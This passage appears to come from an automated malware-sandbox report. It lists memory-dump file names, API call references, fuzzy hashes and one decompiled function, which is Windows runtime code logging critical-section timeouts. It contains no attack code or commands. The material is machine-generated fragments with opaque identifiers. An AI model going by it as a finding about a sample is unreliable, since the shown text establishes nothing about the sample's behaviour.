                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,027A7C63,?), ref: 027AD43B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction ID: dd45116d53c35385631315735388223af4edb706dc91541c2e73df5037f27d47
                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction Fuzzy Hash: 04D0A7757503043BE715FBA89C07F6632CD5B54F54F494064F949D73C3DA64F4004561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6979fcd7bf26ebe3f22053ed97c200beb11eb11225e43d2831bae59df206c66e
                                                                    • Instruction ID: f348a3b8e337c0aa3fd3521df3a537db9dca7cba57e5b53e0b4bb39d6b362390
                                                                    • Opcode Fuzzy Hash: 6979fcd7bf26ebe3f22053ed97c200beb11eb11225e43d2831bae59df206c66e
                                                                    • Instruction Fuzzy Hash: D0B09BF19424C5C9FB11E7604608F17790077E4745F56C175D2024655A4778D095F5B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    C-Code - Quality: 53%
                                                                    			E047CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                    				void* _t7;
                                                                    				intOrPtr _t9;
                                                                    				intOrPtr _t10;
                                                                    				intOrPtr* _t12;
                                                                    				intOrPtr* _t13;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr* _t15;
                                                                    
                                                                    				_t13 = __edx;
                                                                    				_push(_a4);
                                                                    				_t14 =  *[fs:0x18];
                                                                    				_t15 = _t12;
                                                                    				_t7 = E0477CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                    				_push(_t13);
                                                                    				E047C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                    				_t9 =  *_t15;
                                                                    				if(_t9 == 0xffffffff) {
                                                                    					_t10 = 0;
                                                                    				} else {
                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                    				}
                                                                    				_push(_t10);
                                                                    				_push(_t15);
                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                    				return E047C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                    			}










                                                                    0x047cfdda
                                                                    0x047cfde2
                                                                    0x047cfde5
                                                                    0x047cfdec
                                                                    0x047cfdfa
                                                                    0x047cfdff
                                                                    0x047cfe0a
                                                                    0x047cfe0f
                                                                    0x047cfe17
                                                                    0x047cfe1e
                                                                    0x047cfe19
                                                                    0x047cfe19
                                                                    0x047cfe19
                                                                    0x047cfe20
                                                                    0x047cfe21
                                                                    0x047cfe22
                                                                    0x047cfe25
                                                                    0x047cfe40

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047CFDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047CFE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047CFE2B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: 54a316687e86ecc7edbf36e4699af5e4c810fb89568d37206a45fc630c8c40e4
                                                                    • Instruction ID: 46021486248fe692521ec4119820fb3e66fe73dd92f8b430ebebee68d28c9f08
                                                                    • Opcode Fuzzy Hash: 54a316687e86ecc7edbf36e4699af5e4c810fb89568d37206a45fc630c8c40e4
                                                                    • Instruction Fuzzy Hash: 2AF0F672240611BFEA201A55DC0AF23BB5AEB44730F24435CF628562E1EA62F86096F4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%